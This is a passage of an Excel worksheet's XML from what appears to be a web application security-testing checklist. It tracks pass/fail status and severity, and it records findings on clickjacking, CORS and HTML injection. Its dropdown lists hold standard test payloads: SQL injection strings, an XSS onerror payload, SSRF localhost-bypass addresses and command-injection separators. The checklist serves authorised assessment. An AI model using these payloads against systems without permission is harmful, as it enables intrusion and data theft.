    <cfRule type="containsText" dxfId="133" priority="150" operator="containsText" text="Passed">
      <formula>NOT(ISERROR(SEARCH("Passed",D136)))</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="D136">
    <cfRule type="containsText" dxfId="132" priority="147" operator="containsText" text="Not Required">
      <formula>NOT(ISERROR(SEARCH("Not Required",D136)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="131" priority="148" operator="containsText" text="Not Started">
      <formula>NOT(ISERROR(SEARCH("Not Started",D136)))</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="E136">
    <cfRule type="containsText" dxfId="130" priority="136" operator="containsText" text="Critical">
      <formula>NOT(ISERROR(SEARCH("Critical",E136)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="129" priority="137" operator="containsText" text="High">
      <formula>NOT(ISERROR(SEARCH("High",E136)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="128" priority="138" operator="containsText" text="Medium">
      <formula>NOT(ISERROR(SEARCH("Medium",E136)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="127" priority="139" operator="containsText" text="Low">
      <formula>NOT(ISERROR(SEARCH("Low",E136)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="126" priority="140" operator="containsText" text="N/A">
      <formula>NOT(ISERROR(SEARCH("N/A",E136)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="125" priority="141" operator="containsText" text="Informational">
      <formula>NOT(ISERROR(SEARCH("Informational",E136)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="124" priority="142" operator="containsText" text="N/A">
      <formula>NOT(ISERROR(SEARCH("N/A",E136)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="123" priority="145" operator="containsText" text="Failed">
      <formula>NOT(ISERROR(SEARCH("Failed",E136)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="122" priority="146" operator="containsText" text="Passed">
      <formula>NOT(ISERROR(SEARCH("Passed",E136)))</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="E136">
    <cfRule type="containsText" dxfId="121" priority="143" operator="containsText" text="Not Required">
      <formula>NOT(ISERROR(SEARCH("Not Required",E136)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="120" priority="144" operator="containsText" text="Not Started">
      <formula>NOT(ISERROR(SEARCH("Not Started",E136)))</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="D140">
    <cfRule type="containsText" dxfId="119" priority="134" operator="containsText" text="Failed">
      <formula>NOT(ISERROR(SEARCH("Failed",D140)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="118" priority="135" operator="containsText" text="Passed">
      <formula>NOT(ISERROR(SEARCH("Passed",D140)))</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="D140">
    <cfRule type="containsText" dxfId="117" priority="132" operator="containsText" text="Not Required">
      <formula>NOT(ISERROR(SEARCH("Not Required",D140)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="116" priority="133" operator="containsText" text="Not Started">
      <formula>NOT(ISERROR(SEARCH("Not Started",D140)))</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="E140">
    <cfRule type="containsText" dxfId="115" priority="121" operator="containsText" text="Critical">
      <formula>NOT(ISERROR(SEARCH("Critical",E140)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="114" priority="122" operator="containsText" text="High">
      <formula>NOT(ISERROR(SEARCH("High",E140)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="113" priority="123" operator="containsText" text="Medium">
      <formula>NOT(ISERROR(SEARCH("Medium",E140)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="112" priority="124" operator="containsText" text="Low">
      <formula>NOT(ISERROR(SEARCH("Low",E140)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="111" priority="125" operator="containsText" text="N/A">
      <formula>NOT(ISERROR(SEARCH("N/A",E140)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="110" priority="126" operator="containsText" text="Informational">
      <formula>NOT(ISERROR(SEARCH("Informational",E140)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="109" priority="127" operator="containsText" text="N/A">
      <formula>NOT(ISERROR(SEARCH("N/A",E140)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="108" priority="130" operator="containsText" text="Failed">
      <formula>NOT(ISERROR(SEARCH("Failed",E140)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="107" priority="131" operator="containsText" text="Passed">
      <formula>NOT(ISERROR(SEARCH("Passed",E140)))</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="E140">
    <cfRule type="containsText" dxfId="106" priority="128" operator="containsText" text="Not Required">
      <formula>NOT(ISERROR(SEARCH("Not Required",E140)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="105" priority="129" operator="containsText" text="Not Started">
      <formula>NOT(ISERROR(SEARCH("Not Started",E140)))</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="D144">
    <cfRule type="containsText" dxfId="104" priority="119" operator="containsText" text="Failed">
      <formula>NOT(ISERROR(SEARCH("Failed",D144)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="103" priority="120" operator="containsText" text="Passed">
      <formula>NOT(ISERROR(SEARCH("Passed",D144)))</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="D144">
    <cfRule type="containsText" dxfId="102" priority="117" operator="containsText" text="Not Required">
      <formula>NOT(ISERROR(SEARCH("Not Required",D144)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="101" priority="118" operator="containsText" text="Not Started">
      <formula>NOT(ISERROR(SEARCH("Not Started",D144)))</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="E144">
    <cfRule type="containsText" dxfId="100" priority="106" operator="containsText" text="Critical">
      <formula>NOT(ISERROR(SEARCH("Critical",E144)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="99" priority="107" operator="containsText" text="High">
      <formula>NOT(ISERROR(SEARCH("High",E144)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="98" priority="108" operator="containsText" text="Medium">
      <formula>NOT(ISERROR(SEARCH("Medium",E144)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="97" priority="109" operator="containsText" text="Low">
      <formula>NOT(ISERROR(SEARCH("Low",E144)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="96" priority="110" operator="containsText" text="N/A">
      <formula>NOT(ISERROR(SEARCH("N/A",E144)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="95" priority="111" operator="containsText" text="Informational">
      <formula>NOT(ISERROR(SEARCH("Informational",E144)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="94" priority="112" operator="containsText" text="N/A">
      <formula>NOT(ISERROR(SEARCH("N/A",E144)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="93" priority="115" operator="containsText" text="Failed">
      <formula>NOT(ISERROR(SEARCH("Failed",E144)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="92" priority="116" operator="containsText" text="Passed">
      <formula>NOT(ISERROR(SEARCH("Passed",E144)))</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="E144">
    <cfRule type="containsText" dxfId="91" priority="113" operator="containsText" text="Not Required">
      <formula>NOT(ISERROR(SEARCH("Not Required",E144)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="90" priority="114" operator="containsText" text="Not Started">
      <formula>NOT(ISERROR(SEARCH("Not Started",E144)))</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="D145">
    <cfRule type="containsText" dxfId="89" priority="104" operator="containsText" text="Failed">
      <formula>NOT(ISERROR(SEARCH("Failed",D145)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="88" priority="105" operator="containsText" text="Passed">
      <formula>NOT(ISERROR(SEARCH("Passed",D145)))</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="D145">
    <cfRule type="containsText" dxfId="87" priority="102" operator="containsText" text="Not Required">
      <formula>NOT(ISERROR(SEARCH("Not Required",D145)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="86" priority="103" operator="containsText" text="Not Started">
      <formula>NOT(ISERROR(SEARCH("Not Started",D145)))</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="E145">
    <cfRule type="containsText" dxfId="85" priority="91" operator="containsText" text="Critical">
      <formula>NOT(ISERROR(SEARCH("Critical",E145)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="84" priority="92" operator="containsText" text="High">
      <formula>NOT(ISERROR(SEARCH("High",E145)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="83" priority="93" operator="containsText" text="Medium">
      <formula>NOT(ISERROR(SEARCH("Medium",E145)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="82" priority="94" operator="containsText" text="Low">
      <formula>NOT(ISERROR(SEARCH("Low",E145)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="81" priority="95" operator="containsText" text="N/A">
      <formula>NOT(ISERROR(SEARCH("N/A",E145)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="80" priority="96" operator="containsText" text="Informational">
      <formula>NOT(ISERROR(SEARCH("Informational",E145)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="79" priority="97" operator="containsText" text="N/A">
      <formula>NOT(ISERROR(SEARCH("N/A",E145)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="78" priority="100" operator="containsText" text="Failed">
      <formula>NOT(ISERROR(SEARCH("Failed",E145)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="77" priority="101" operator="containsText" text="Passed">
      <formula>NOT(ISERROR(SEARCH("Passed",E145)))</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="E145">
    <cfRule type="containsText" dxfId="76" priority="98" operator="containsText" text="Not Required">
      <formula>NOT(ISERROR(SEARCH("Not Required",E145)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="75" priority="99" operator="containsText" text="Not Started">
      <formula>NOT(ISERROR(SEARCH("Not Started",E145)))</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="D42:D49">
    <cfRule type="containsText" dxfId="74" priority="89" operator="containsText" text="Failed">
      <formula>NOT(ISERROR(SEARCH("Failed",D42)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="73" priority="90" operator="containsText" text="Passed">
      <formula>NOT(ISERROR(SEARCH("Passed",D42)))</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="D42:D49">
    <cfRule type="containsText" dxfId="72" priority="87" operator="containsText" text="Not Required">
      <formula>NOT(ISERROR(SEARCH("Not Required",D42)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="71" priority="88" operator="containsText" text="Not Started">
      <formula>NOT(ISERROR(SEARCH("Not Started",D42)))</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="E42:E49">
    <cfRule type="containsText" dxfId="70" priority="83" operator="containsText" text="Not Required">
      <formula>NOT(ISERROR(SEARCH("Not Required",E42)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="69" priority="84" operator="containsText" text="Not Started">
      <formula>NOT(ISERROR(SEARCH("Not Started",E42)))</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="E42:E49">
    <cfRule type="containsText" dxfId="68" priority="76" operator="containsText" text="Critical">
      <formula>NOT(ISERROR(SEARCH("Critical",E42)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="67" priority="77" operator="containsText" text="High">
      <formula>NOT(ISERROR(SEARCH("High",E42)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="66" priority="78" operator="containsText" text="Medium">
      <formula>NOT(ISERROR(SEARCH("Medium",E42)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="65" priority="79" operator="containsText" text="Low">
      <formula>NOT(ISERROR(SEARCH("Low",E42)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="64" priority="80" operator="containsText" text="N/A">
      <formula>NOT(ISERROR(SEARCH("N/A",E42)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="63" priority="81" operator="containsText" text="Informational">
      <formula>NOT(ISERROR(SEARCH("Informational",E42)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="62" priority="82" operator="containsText" text="N/A">
      <formula>NOT(ISERROR(SEARCH("N/A",E42)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="61" priority="85" operator="containsText" text="Failed">
      <formula>NOT(ISERROR(SEARCH("Failed",E42)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="60" priority="86" operator="containsText" text="Passed">
      <formula>NOT(ISERROR(SEARCH("Passed",E42)))</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="D59">
    <cfRule type="containsText" dxfId="59" priority="74" operator="containsText" text="Incomplete">
      <formula>NOT(ISERROR(SEARCH("Incomplete",D59)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="58" priority="75" operator="containsText" text="Completed">
      <formula>NOT(ISERROR(SEARCH("Completed",D59)))</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="D59">
    <cfRule type="containsText" dxfId="57" priority="72" operator="containsText" text="Not Required">
      <formula>NOT(ISERROR(SEARCH("Not Required",D59)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="56" priority="73" operator="containsText" text="Not Started">
      <formula>NOT(ISERROR(SEARCH("Not Started",D59)))</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="E59">
    <cfRule type="containsText" dxfId="55" priority="61" operator="containsText" text="Critical">
      <formula>NOT(ISERROR(SEARCH("Critical",E59)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="54" priority="62" operator="containsText" text="High">
      <formula>NOT(ISERROR(SEARCH("High",E59)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="53" priority="63" operator="containsText" text="Medium">
      <formula>NOT(ISERROR(SEARCH("Medium",E59)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="52" priority="64" operator="containsText" text="Low">
      <formula>NOT(ISERROR(SEARCH("Low",E59)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="51" priority="65" operator="containsText" text="N/A">
      <formula>NOT(ISERROR(SEARCH("N/A",E59)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="50" priority="66" operator="containsText" text="Informational">
      <formula>NOT(ISERROR(SEARCH("Informational",E59)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="49" priority="67" operator="containsText" text="N/A">
      <formula>NOT(ISERROR(SEARCH("N/A",E59)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="48" priority="70" operator="containsText" text="Failed">
      <formula>NOT(ISERROR(SEARCH("Failed",E59)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="47" priority="71" operator="containsText" text="Passed">
      <formula>NOT(ISERROR(SEARCH("Passed",E59)))</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="E59">
    <cfRule type="containsText" dxfId="46" priority="68" operator="containsText" text="Not Required">
      <formula>NOT(ISERROR(SEARCH("Not Required",E59)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="45" priority="69" operator="containsText" text="Not Started">
      <formula>NOT(ISERROR(SEARCH("Not Started",E59)))</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="D149">
    <cfRule type="containsText" dxfId="44" priority="59" operator="containsText" text="Failed">
      <formula>NOT(ISERROR(SEARCH("Failed",D149)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="43" priority="60" operator="containsText" text="Passed">
      <formula>NOT(ISERROR(SEARCH("Passed",D149)))</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="D149">
    <cfRule type="containsText" dxfId="42" priority="57" operator="containsText" text="Not Required">
      <formula>NOT(ISERROR(SEARCH("Not Required",D149)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="41" priority="58" operator="containsText" text="Not Started">
      <formula>NOT(ISERROR(SEARCH("Not Started",D149)))</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="E149">
    <cfRule type="containsText" dxfId="40" priority="46" operator="containsText" text="Critical">
      <formula>NOT(ISERROR(SEARCH("Critical",E149)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="39" priority="47" operator="containsText" text="High">
      <formula>NOT(ISERROR(SEARCH("High",E149)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="38" priority="48" operator="containsText" text="Medium">
      <formula>NOT(ISERROR(SEARCH("Medium",E149)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="37" priority="49" operator="containsText" text="Low">
      <formula>NOT(ISERROR(SEARCH("Low",E149)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="36" priority="50" operator="containsText" text="N/A">
      <formula>NOT(ISERROR(SEARCH("N/A",E149)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="35" priority="51" operator="containsText" text="Informational">
      <formula>NOT(ISERROR(SEARCH("Informational",E149)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="34" priority="52" operator="containsText" text="N/A">
      <formula>NOT(ISERROR(SEARCH("N/A",E149)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="33" priority="55" operator="containsText" text="Failed">
      <formula>NOT(ISERROR(SEARCH("Failed",E149)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="32" priority="56" operator="containsText" text="Passed">
      <formula>NOT(ISERROR(SEARCH("Passed",E149)))</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="E149">
    <cfRule type="containsText" dxfId="31" priority="53" operator="containsText" text="Not Required">
      <formula>NOT(ISERROR(SEARCH("Not Required",E149)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="30" priority="54" operator="containsText" text="Not Started">
      <formula>NOT(ISERROR(SEARCH("Not Started",E149)))</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="D32">
    <cfRule type="containsText" dxfId="29" priority="29" operator="containsText" text="Failed">
      <formula>NOT(ISERROR(SEARCH("Failed",D32)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="28" priority="30" operator="containsText" text="Passed">
      <formula>NOT(ISERROR(SEARCH("Passed",D32)))</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="D32">
    <cfRule type="containsText" dxfId="27" priority="27" operator="containsText" text="Not Required">
      <formula>NOT(ISERROR(SEARCH("Not Required",D32)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="26" priority="28" operator="containsText" text="Not Started">
      <formula>NOT(ISERROR(SEARCH("Not Started",D32)))</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="E32">
    <cfRule type="containsText" dxfId="25" priority="16" operator="containsText" text="Critical">
      <formula>NOT(ISERROR(SEARCH("Critical",E32)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="24" priority="17" operator="containsText" text="High">
      <formula>NOT(ISERROR(SEARCH("High",E32)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="23" priority="18" operator="containsText" text="Medium">
      <formula>NOT(ISERROR(SEARCH("Medium",E32)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="22" priority="19" operator="containsText" text="Low">
      <formula>NOT(ISERROR(SEARCH("Low",E32)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="21" priority="20" operator="containsText" text="N/A">
      <formula>NOT(ISERROR(SEARCH("N/A",E32)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="20" priority="21" operator="containsText" text="Informational">
      <formula>NOT(ISERROR(SEARCH("Informational",E32)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="19" priority="22" operator="containsText" text="N/A">
      <formula>NOT(ISERROR(SEARCH("N/A",E32)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="18" priority="25" operator="containsText" text="Failed">
      <formula>NOT(ISERROR(SEARCH("Failed",E32)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="17" priority="26" operator="containsText" text="Passed">
      <formula>NOT(ISERROR(SEARCH("Passed",E32)))</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="E32">
    <cfRule type="containsText" dxfId="16" priority="23" operator="containsText" text="Not Required">
      <formula>NOT(ISERROR(SEARCH("Not Required",E32)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="15" priority="24" operator="containsText" text="Not Started">
      <formula>NOT(ISERROR(SEARCH("Not Started",E32)))</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="D33">
    <cfRule type="containsText" dxfId="14" priority="14" operator="containsText" text="Failed">
      <formula>NOT(ISERROR(SEARCH("Failed",D33)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="13" priority="15" operator="containsText" text="Passed">
      <formula>NOT(ISERROR(SEARCH("Passed",D33)))</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="D33">
    <cfRule type="containsText" dxfId="12" priority="12" operator="containsText" text="Not Required">
      <formula>NOT(ISERROR(SEARCH("Not Required",D33)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="11" priority="13" operator="containsText" text="Not Started">
      <formula>NOT(ISERROR(SEARCH("Not Started",D33)))</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="E33">
    <cfRule type="containsText" dxfId="10" priority="1" operator="containsText" text="Critical">
      <formula>NOT(ISERROR(SEARCH("Critical",E33)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="9" priority="2" operator="containsText" text="High">
      <formula>NOT(ISERROR(SEARCH("High",E33)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="8" priority="3" operator="containsText" text="Medium">
      <formula>NOT(ISERROR(SEARCH("Medium",E33)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="7" priority="4" operator="containsText" text="Low">
      <formula>NOT(ISERROR(SEARCH("Low",E33)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="6" priority="5" operator="containsText" text="N/A">
      <formula>NOT(ISERROR(SEARCH("N/A",E33)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="5" priority="6" operator="containsText" text="Informational">
      <formula>NOT(ISERROR(SEARCH("Informational",E33)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="4" priority="7" operator="containsText" text="N/A">
      <formula>NOT(ISERROR(SEARCH("N/A",E33)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="3" priority="10" operator="containsText" text="Failed">
      <formula>NOT(ISERROR(SEARCH("Failed",E33)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="2" priority="11" operator="containsText" text="Passed">
      <formula>NOT(ISERROR(SEARCH("Passed",E33)))</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="E33">
    <cfRule type="containsText" dxfId="1" priority="8" operator="containsText" text="Not Required">
      <formula>NOT(ISERROR(SEARCH("Not Required",E33)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="0" priority="9" operator="containsText" text="Not Started">
      <formula>NOT(ISERROR(SEARCH("Not Started",E33)))</formula>
    </cfRule>
  </conditionalFormatting>
  <dataValidations count="12">
    <dataValidation type="list" allowBlank="1" showInputMessage="1" showErrorMessage="1" sqref="D102 D57:D59" xr:uid="{F391B7C0-F3BC-4F83-987F-E09555FFA5D5}">
      <formula1>"Completed, Incomplete, Not Started, Not required"</formula1>
    </dataValidation>
    <dataValidation showInputMessage="1" showErrorMessage="1" sqref="A7 A11 A17" xr:uid="{2EEEEE2C-5F22-4A8A-9998-4C071534E8D1}"/>
    <dataValidation type="list" allowBlank="1" showInputMessage="1" showErrorMessage="1" sqref="D9:D10 D109:D121 D36:D38 D41:D49 D52:D53 D105:D106 D66:D73 D13:D16 D128 D124 D100:D101 D87:D93 D96:D97 D76:D84 D62 D149 D132 D136 D140 D144:D145 D19:D33" xr:uid="{7FD194D0-068B-4BC6-8E8C-518460F88E0C}">
      <formula1>"Passed, Failed, Not Started, Not Required"</formula1>
    </dataValidation>
    <dataValidation type="list" allowBlank="1" showInputMessage="1" showErrorMessage="1" sqref="E52:E53 E109:E121 E9:E10 E62 E36:E38 E41:E49 E57:E59 E105:E106 E66:E73 E87:E93 E96:E97 E13:E16 E128 E100:E102 E124 E132 E149 E76:E84 E136 E140 E144:E145 E19:E33" xr:uid="{37019429-A522-4DA9-91EB-3A171EADB484}">
      <formula1>"N/A,Informational,Low,Medium,High,Critical"</formula1>
    </dataValidation>
    <dataValidation type="list" allowBlank="1" showInputMessage="1" showErrorMessage="1" sqref="B105" xr:uid="{E0DF9316-80EE-4AE1-B5C8-F383C989CFF5}">
      <formula1>"&lt;h1&gt;Hello World &lt;/h1&gt;"</formula1>
    </dataValidation>
    <dataValidation type="list" allowBlank="1" showInputMessage="1" showErrorMessage="1" sqref="B106" xr:uid="{B605DC50-A453-4F83-9D06-18959A5ADEB6}">
      <formula1>" %3Ch1%3EHello%20World%3C%2Fh1%3E, %3cimg src=x onerror=prompt(1)%3e"</formula1>
    </dataValidation>
    <dataValidation type="list" allowBlank="1" showInputMessage="1" showErrorMessage="1" sqref="B77" xr:uid="{B9ACD245-0E7B-49D4-9D43-76107E97A322}">
      <formula1>"http://[::]:80/, N.A"</formula1>
    </dataValidation>
    <dataValidation type="list" allowBlank="1" showInputMessage="1" showErrorMessage="1" sqref="B78" xr:uid="{D8C8F546-83BA-4125-98D5-400BC39D96DF}">
      <formula1>"http://213070643, http://2852039166, http://3232235521, N.A"</formula1>
    </dataValidation>
    <dataValidation type="list" allowBlank="1" showInputMessage="1" showErrorMessage="1" sqref="B79" xr:uid="{884003F7-1523-4DC9-98A7-465C86D6372B}">
      <formula1>"http://127.1, N.A"</formula1>
    </dataValidation>
    <dataValidation type="list" allowBlank="1" showInputMessage="1" showErrorMessage="1" sqref="B81:B83" xr:uid="{459BEAD4-EA9F-4222-B4B5-8EC586D99432}">
      <formula1>"b0x.mannulinux.org, N.A"</formula1>
    </dataValidation>
    <dataValidation type="list" allowBlank="1" showInputMessage="1" showErrorMessage="1" sqref="B36" xr:uid="{E65C40C5-CCD4-42BB-8035-F9037AB98426}">
      <formula1>"N.A, ;, ||, &amp;, &amp;&amp;, "</formula1>
    </dataValidation>
    <dataValidation type="list" allowBlank="1" showInputMessage="1" showErrorMessage="1" sqref="B87:B89 C87:C88" xr:uid="{775128F6-E8D8-4B75-945D-E89E797EBDB2}">
      <formula1>"N.A , 1""OR ""1""=""1, ' OR 1=1--, ' OR '1' ='1, ' OR 1=1#, 1' OR 1=1--,  1"" OR 1=1--,  1' || '1'='1,  "") OR (""1"")=(""1, ""OR """"="", PayloadAllThings"</formula1>
    </dataValidation>
  </dataValidations>
  <hyperlinks>
    <hyperlink ref="B78" r:id="rId1" xr:uid="{9410A0B3-59E4-4BF2-AD12-B37063F02237}"/>
    <hyperlink ref="B10" r:id="rId2" xr:uid="{E303B58E-C817-483F-93E3-3C3C4749BA6C}"/>
    <hyperlink ref="B22" r:id="rId3" xr:uid="{06DF5C61-9DF0-4DEB-A727-21984A08D201}"/>
    <hyperlink ref="B23" r:id="rId4" xr:uid="{A5FE9057-1E3A-4D7B-96BD-F4C53B99D0BF}"/>
    <hyperlink ref="C31" r:id="rId5" xr:uid="{5FCB6985-A220-4CAE-B2EB-C0C8F01DA9B4}"/>
    <hyperlink ref="F106" location="HTMLI!A1" display="Issue found to exist in a file upload functionality. A file name containing a HTML tag throws HTMLI when it is uploaded.  Please refer HTMLI for more details" xr:uid="{0289D4D7-579D-4B91-8AC9-C11CA503B555}"/>
    <hyperlink ref="F9" location="Clickjacking!A1" display="X-Frame-Path header is present in most part of the application but it is not present in  BPOS module. Please refer Clickjacking for more details." xr:uid="{82DD3454-A064-4AB4-98D0-EC0FAEDF2C62}"/>
    <hyperlink ref="F10" location="Clickjacking!A1" display="Few of the security headers are missing. Please refer Clickjacking for more details" xr:uid="{BC5DE2E3-2EF8-4905-A94D-192440A4F0B6}"/>
    <hyperlink ref="C101" r:id="rId6" xr:uid="{C99CB29D-2C8F-4489-B567-CD31E1D63684}"/>
    <hyperlink ref="F30" location="'Secure Connection'!A1" display="A secure connection issue is found to exist in the application. Please refer Secure Connection for more details" xr:uid="{2EE0E79B-0E48-4266-97B3-A5054EECF1A0}"/>
    <hyperlink ref="C30" r:id="rId7" xr:uid="{E2412CB1-5060-4635-8A9E-8FE193D4EC05}"/>
    <hyperlink ref="F13" location="CORS!A1" display="The domain URL mentioned corresponding to the origin header in the request is getting reflected in the response section corresponding to Access-Control-Allow-Origin header but we were unable to exploit the CORS. Please refer CORS for further information" xr:uid="{07DA6F49-143F-48B4-95EA-ECA2C2AFE21E}"/>
    <hyperlink ref="B145" r:id="rId8" xr:uid="{13006792-91DE-4F57-9992-1D453D5F25B1}"/>
    <hyperlink ref="B45" r:id="rId9" xr:uid="{F5BCD3CF-81C9-40ED-BED0-772B5E892127}"/>
    <hyperlink ref="B57" location="'DOM (Source - Sink)'!A1" display="DOM(Source-Sink) List" xr:uid="{BA31622E-5754-49C8-8E32-6148BA3E6B26}"/>
    <hyperlink ref="B47" location="'XSS Polyglot Payloads'!A1" display="XSS Polyglot Payloads" xr:uid="{56D175B0-8AE8-45A1-95C4-D57F4AA895AE}"/>
    <hyperlink ref="B44" r:id="rId10" xr:uid="{D8FEC354-158C-4D47-8BAB-6EEC9B7CBC28}"/>
